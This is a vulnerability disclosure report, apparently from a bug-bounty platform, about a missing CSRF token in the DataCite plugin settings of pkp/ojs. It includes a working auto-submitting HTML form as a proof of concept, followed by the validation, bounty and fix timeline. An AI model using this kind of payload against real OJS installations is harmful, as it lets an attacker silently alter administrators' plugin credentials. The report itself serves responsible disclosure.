Cross-Site Request Forgery (CSRF) in pkp/ojs

Valid

Reported on

Oct 16th 2021


Description

No CSRF token in DataCite save settings plugin (OJS only)

POC

<html>                                                                                                             
  <body>                                                                                                           
        <form action="http://10.0.2.15:8000/index.php/e/$$$call$$$/grid/settings/plugins/settings-plugin-grid/manage?plugin=DataciteExportPlugin&category=importexport&verb=save" method="POST"> 
           <input type="hidden" name="username" value="" />
           <input type="hidden" name="password" value="" />
           <input type="hidden" name="testUsername" value="" />
           <input type="hidden" name="testPassword" value="" />
           <input type="hidden" name="testDOIPrefix" value="" />
           <input type="hidden" name="submitFormButton" value="" />
        </form>
        <script>
        document.forms[0].submit();
        </script>
  </body>
</html> 
````
# Impact
This vulnerability is capable of tricking admins to change settings for OJS DataCite plugin
We have contacted a member of the pkp/ojs team and are waiting to hear back a month ago
We have contacted a member of the pkp/ojs team and are waiting to hear back a month ago
We have contacted a member of the pkp/ojs team and are waiting to hear back a month ago
haxatron modified their report
a month ago
haxatron modified their report
a month ago
haxatron modified their report
a month ago
Alec Smecher validated this vulnerability a month ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher confirmed that a fix has been merged on 41a389 a month ago
Alec Smecher has been awarded the fix bounty